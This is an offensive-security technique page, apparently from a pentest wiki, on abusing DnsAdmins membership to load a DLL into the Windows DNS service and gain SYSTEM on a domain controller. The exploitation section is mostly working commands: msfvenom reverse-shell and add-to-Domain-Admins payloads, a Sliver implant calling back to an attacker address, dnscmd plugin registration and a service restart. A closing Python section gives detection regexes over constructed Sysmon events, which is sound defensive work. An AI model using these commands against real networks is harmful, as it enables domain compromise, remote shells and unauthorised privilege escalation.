👾 Overview

Members of the DnsAdmins group can change the DNS Server service configuration so that it loads an arbitrary DLL (the server-level plugin DLL setting) the next time the service starts. Because the DLL is loaded into the DNS service process, its code runs as SYSTEM, giving SYSTEM-level code execution on the DNS server, which is usually a domain controller.

🔍 Discovery

This technique requires control of an account that is a member of the DnsAdmins group.

# Check your user's groups
whoami /groups
 
# Use PowerView to find DNSAdmins
Get-NetGroupMember -Identity "DNSAdmins"
 
# Use PowerShell to find DNSAdmins
Get-ADGroupMember -Identity "DnsAdmins"

📌 Exploitation

First, generate a malicious DLL for the DNS server to execute:

# Using Sliver C2 to generate a DLL
generate --http [IP]:[PORT] --format shared --os windows --skip-symbols
 
# Using MSFVenom to generate a DLL to add user to DA
msfvenom -p windows/x64/exec cmd='net group "domain admins" [USERNAME] /add /domain' -f dll -o adduser.dll
 
# Using MSFVenom to generate a reverse shell DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f dll > revshell.dll

Next, use dnscmd.exe against the DNS server to register the DLL as the server-level plugin, then restart the DNS service so that it loads the DLL:

Note: restarting the service interrupts name resolution for the domain while the service is down, so this step is disruptive and noticeable.

# Register DLL
dnscmd.exe [HOSTNAME] /config /serverlevelplugindll [DLL PATH]
 
# Restart DNS Service (executes payload)
sc.exe stop dns
sc.exe start dns
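For defenders, the observable footprint of this technique is a `dnscmd /config /serverlevelplugindll` command (or a direct write to the ServerLevelPluginDll value under the DNS service's Parameters registry key) followed by a restart of the DNS service. The following Python example is added here and is not part of the original page: it runs simple detection logic over constructed Sysmon-style process-creation and registry-set events; the event field names, user names and sample paths are assumptions.

```python
import re

# Constructed Sysmon-style events (EventID 1 = process create, 13 = registry value set).
# These records are illustrative samples, not log data from the original page.
SAMPLE_EVENTS = [
    {"EventID": 1, "User": "CORP\\jdoe",
     "CommandLine": r"dnscmd.exe DC01 /config /serverlevelplugindll \\10.0.0.5\share\payload.dll"},
    {"EventID": 1, "User": "CORP\\dnsops", "CommandLine": "dnscmd.exe /zoneprint corp.local"},
    {"EventID": 13, "User": "CORP\\jdoe", "Details": r"C:\Users\Public\payload.dll",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll"},
    {"EventID": 13, "User": "CORP\\dnsops", "Details": "10.0.0.1",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\DNS\Parameters\Forwarders"},
    {"EventID": 1, "User": "CORP\\jdoe", "CommandLine": "sc.exe stop dns"},
    {"EventID": 1, "User": "CORP\\jdoe", "CommandLine": "sc.exe start dns"},
]

# dnscmd invoked with the server-level plugin DLL option (case-insensitive, any target host)
PLUGIN_CMD = re.compile(r"dnscmd(\.exe)?\b.*\s/config\s+/serverlevelplugindll\b", re.I)
# Direct write to the ServerLevelPluginDll value of the DNS service parameters key
PLUGIN_KEY = re.compile(r"\\services\\dns\\parameters\\serverlevelplugindll$", re.I)
# Service stop/start of the DNS service via sc or net
DNS_RESTART = re.compile(r"^(sc(\.exe)?|net(\.exe)?)\s+(stop|start)\s+dns\b", re.I)


def detect_dns_plugin_abuse(events):
    """Return a list of findings. Every plugin-DLL configuration is reported; a DNS
    service restart is reported only when the same principal configured a plugin
    DLL earlier in the stream, since the restart is what actually loads the DLL."""
    findings = []
    configured_by = set()  # principals that have set ServerLevelPluginDll so far
    for ev in events:
        user = ev.get("User", "")
        cmd = ev.get("CommandLine", "")
        if ev["EventID"] == 1 and PLUGIN_CMD.search(cmd):
            findings.append({"rule": "dnscmd_set_plugin_dll", "user": user, "evidence": cmd})
            configured_by.add(user)
        elif ev["EventID"] == 13 and PLUGIN_KEY.search(ev.get("TargetObject", "")):
            findings.append({"rule": "registry_set_plugin_dll", "user": user,
                             "evidence": ev.get("Details", "")})
            configured_by.add(user)
        elif ev["EventID"] == 1 and DNS_RESTART.search(cmd) and user in configured_by:
            findings.append({"rule": "dns_restart_after_plugin_set", "user": user, "evidence": cmd})
    return findings


if __name__ == "__main__":
    for f in detect_dns_plugin_abuse(SAMPLE_EVENTS):
        print(f"{f['rule']:30} {f['user']:15} {f['evidence']}")
```

In a real deployment the same three rules map onto process-creation (4688/Sysmon 1) and registry (Sysmon 13) telemetry, and any non-empty ServerLevelPluginDll value on a domain controller deserves review regardless of who set it.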